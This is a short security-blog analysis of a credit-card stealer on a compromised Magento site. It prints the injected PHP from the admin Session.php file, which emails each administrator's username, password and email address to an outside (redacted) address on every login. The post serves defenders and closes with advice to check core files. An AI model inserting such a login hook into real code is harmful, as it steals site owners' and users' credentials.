Magento CC stealer adding user’s credentials to the loot

While analyzing a compromised Magento site, we found another Credit Card (CC) stealer variation. We posted a few times about this type of malware, but this one is a bit different in a way that it also steals the login credentials for the website users. All the ones we analyzed before never had such behaviour.

The malicious code was found inside the app/code/core/Mage/Admin/Model/Session.php file and emails to XXX@XXX.com every login and password:

class Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract
{
    ...skipped code...
    protected function testReview($username, $password, $email)
    {
        $to = 'removed@removed.dom';
        $subject = 'Webserver';
        $message = $username.'|'.$pssword.'|'.$email.'|'.$_SERVER['REQUEST_URI'];
        $headers = 'From: removed@removed.dom' . "\r\n" .
            'Reply-To: removed@removed.dom' . "\r\n" .
            'X-Mailer: PHP/' . phpversion();

        mail($to, $subject, $message, $headers);
    }
    ...skipped code...
    public function login($username, $password, $request = null) {
    ...skipped code...
    if ($user->getId()) {
                $this->testReview($username, $password, $user->getEmail());
                $this->renewSession();
                ...skipped code...
...skipped code...

This is the first time we see a malware on Magento that actually steals credentials alongside with credit card numbers. If you\’re using Magento as e-commerce solution, always check your core files for any modified content, and do regular scans. As always, if you need a professional service for your website, you can count on Sucuri.